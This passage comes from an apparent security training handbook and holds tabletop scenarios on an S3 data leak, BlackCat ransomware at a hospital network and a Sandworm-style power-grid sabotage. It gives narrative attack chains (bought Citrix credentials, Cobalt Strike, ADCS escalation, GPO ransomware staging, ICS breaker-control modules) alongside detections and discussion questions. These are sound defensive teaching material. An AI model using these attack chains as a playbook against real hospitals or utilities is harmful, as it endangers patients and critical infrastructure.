| Public S3 bucket | IaC template missing block_public_access | Checkov gate + SCPs |
| S3 access logging disabled | Not in deployment checklist | Config rule: s3-bucket-logging-enabled |
| No Macie coverage | Only enabled on "sensitive" tagged buckets | Macie on all buckets |
| No GuardDuty finding | Anomaly baseline not tuned for off-hours large downloads | GuardDuty + sensitivity tuning |
| 96-hour detection gap | No real-time alerting on S3 public access | EventBridge → SNS on public bucket events |
Discussion Questions¶
- S3 Block Public Access exists as an account-level control — why was it not enabled?
- At hour 8 of the incident, the CEO asks "can we not disclose?" — what is your response?
- Calculate the GDPR notification deadline; what happens if you miss it?
- How do you communicate to 450K customers? What do you tell them?
- PCIDSS implications for the partial card data — what additional reporting is required?
SC-007: Healthcare Ransomware — Patient Safety Impact¶
Duration: Week-long simulated outbreak (or 3-hour tabletop) Threat Actor: ALPHV/BlackCat affiliate Target: Regional hospital network (12 facilities, 8,000 staff) Impact: Clinical systems offline 9 days; EHR encrypted; 3 patient safety incidents
Attack Narrative¶
DAY -14: INITIAL ACCESS
────────────────────────────────────────────────────────────────
IAB (Initial Access Broker) sells RDP credentials:
Target: \\DESKTOP-CITRIX01 (Citrix gateway — unpatched CVE-2019-19781)
Credentials: svc-citrix-admin / Citrix2019!
Price paid: $8,000 on underground forum
Affiliate purchases access, establishes Cobalt Strike beacon
Beacon communicates over HTTPS to categorized CDN domain
No EDR on Citrix server — legacy Windows Server 2012 R2
DAY -7 to -1: RECONNAISSANCE AND STAGING
────────────────────────────────────────────────────────────────
BloodHound reveals path to DA via misconfigured ADCS (ESC1)
ALPHV affiliate obtains Domain Admin in 4 hours
Identifies EHR system: Epic on 847 clinical workstations + 12 servers
Identifies PACS (radiology imaging): 23 TB on dedicated SAN
Identifies backup: Veeam on Windows VM (not offline/immutable)
Stages BlackCat encryptor on 200 systems via GPO
DAY 0: DETONATION — 03:47 AM (Sunday)
────────────────────────────────────────────────────────────────
BlackCat ransomware executes across network:
- 847 EHR workstations encrypted (Epic offline)
- 12 clinical servers encrypted
- PACS imaging system encrypted (no backup — encrypted in-place)
- Backup server encrypted
- 2.1M patient records exfiltrated to BlackCat leak infrastructure
Staff arrive at 06:30 AM — all clinical systems display ransom note
PATIENT SAFETY INCIDENTS (Day 0-2):
────────────────────────────────────────────────────────────────
INCIDENT 1: ICU patient — medication dosing from memory;
incorrect dose administered (minor injury)
INCIDENT 2: Lab results unavailable — delayed sepsis diagnosis
Patient transferred, recovered
INCIDENT 3: Surgery scheduled without imaging — postponed 4 days
Patient outcome not adversely affected
Ransom demand: $4.8M in Monero
Attacker: "Pay within 72 hours or patient data published"
OFAC check: ALPHV not (yet) on SDN list — payment legally permissible
HHS/OCR notified (HIPAA: within 60 days of discovery)
FBI engaged — decryption key available for cooperating victims
Crisis Decision Matrix¶
| Option | Pro | Con |
|---|---|---|
| Pay ransom | Fastest path to decryption keys | Funds criminal operations; no guarantee |
| Restore from backup | No ransom payment | Backups also encrypted; 2+ weeks to restore |
| FBI-assisted recovery | Free decryption (if key available) | FBI may not have ALPHV key; slow |
| Manual recovery + downtime procedures | Independent of attacker | 3-6 weeks; patient safety risk continues |
Discussion Questions¶
- At what point does ransomware in a hospital become a patient safety emergency? Who decides?
- The hospital board wants to pay the ransom immediately — as CISO, what is your advice?
- HIPAA breach: 2.1M records exfiltrated — notification timeline and scope?
- HHS has proposed a rule requiring cyber standards for hospitals — how does this incident support that?
- How do you run clinical operations for 9 days with no EHR? Describe the downtime procedures.
- Post-incident: three controls that would have prevented this entirely — prioritize by cost/impact.
SC-008: OT/ICS Sabotage — Power Grid Attack¶
Duration: Long-form expert tabletop (4-6 hours) | NERC CIP compliance context Threat Actor: Nation-state (ELECTRUM/Sandworm-style — Russian GRU) Target: Regional electric utility (500MW generation facility) Objective: Destabilize grid operations during geopolitical crisis Reference: Based on CRASHOVERRIDE/Industroyer2 methodology (2016/2022 Ukraine)
Attack Narrative¶
PHASE 1: IT NETWORK COMPROMISE (Months 1-3)
────────────────────────────────────────────────────────────────
Initial access: Spearphishing IT staff → credential capture
Lateral movement: IT network → historian servers in OT DMZ
Persistence: Custom implant on engineering workstation (EWS)
Discovery: Map OT network via Dragos-detectable passive scanning
Intelligence: ICS protocols in use: IEC 61850, IEC 104, Modbus
PHASE 2: OT NETWORK ACCESS (Months 3-5)
────────────────────────────────────────────────────────────────
Jump from IT DMZ to OT DMZ via historian server
Attacker installs custom ICS malware (CRASHOVERRIDE-equivalent):
Module 1: IEC 61850 protocol module (breaker control)
Module 2: IEC 104 module (SCADA communication)
Module 3: Data wiper (post-attack cleanup)
Module 4: Denial-of-service for Safety systems
PHASE 3: DISRUPTION EVENT (Coordinated with geopolitical event)
────────────────────────────────────────────────────────────────
T+00:00 — Malware issues OPEN commands to 17 transmission breakers
T+00:05 — 500MW drops from grid; 230,000 customers lose power
T+00:10 — Operators attempt manual restoration — HMI unresponsive (DoS)
T+00:15 — ICS wiper executes: overwrites EWS firmware
T+00:30 — Physical manual operations begin (breakers require on-site reset)
T+04:30 — Power restored to 85% of affected customers
T+09:00 — Full restoration; EWS requires hardware replacement
DISCOVERY AND ATTRIBUTION
────────────────────────────────────────────────────────────────
CISA Emergency Directive issued
ICS forensics team (Dragos/Mandiant) deployed
Malware samples match ELECTRUM toolset
Attribution: GRU Unit 74455 (Sandworm Team)
NERC CIP violation findings: CIP-005 (ESP), CIP-007 (patch management)
ICS-Specific Detection Opportunities¶
| Indicator | Detection Method | Tool |
|---|---|---|
| Abnormal protocol commands (OPEN to breakers) | Zeek ICS protocol analysis | Claroty / Dragos |
| EWS communicating with IT network | East-west ICS traffic baseline | Nozomi Networks |
| Historian server making unusual connections | OT DMZ firewall logs | Palo Alto NGFW |
| Passive scanning of ICS devices | Dragos Asset Identification | Dragos Platform |
| Protocol anomaly: IEC 61850 GOOSE spoofing | Signature detection | Claroty |
NERC CIP Compliance Implications¶
| Standard | Requirement Violated | Penalty Range |
|---|---|---|
| CIP-005-6 | Electronic Security Perimeter insufficient | $1K–$1M/day |
| CIP-007-6 | Security patch management — EWS unpatched 18 months | $1K–$1M/day |
| CIP-008-6 | Incident response plan not exercised for ICS | $1K–$1M/day |
| CIP-010-3 | Configuration change management failures | $1K–$1M/day |
Discussion Questions¶
- The IT/OT boundary was crossed via the historian — what architectural control should have prevented this?
- NERC CIP requires incident reporting to E-ISAC — what is the timeline and scope?
- The wiper destroyed the EWS firmware — how do you recover from a hardware-level attack?
- Attribution to a nation-state — does the utility have any recourse? What does the US government do?
- Safety systems (SIS) were targeted by the DoS module — what is the IEC 62443 guidance for SIS independence?
- How do you test ICS defenses without disrupting live operations?
For tabletop exercise facilitation guides, see Labs → Lab 3: IR Simulation. For threat actor background, see Chapter 22: Threat Actor Encyclopedia. For AI security scenarios, see Chapter 37: AI Security and Chapter 11: LLM Guardrails.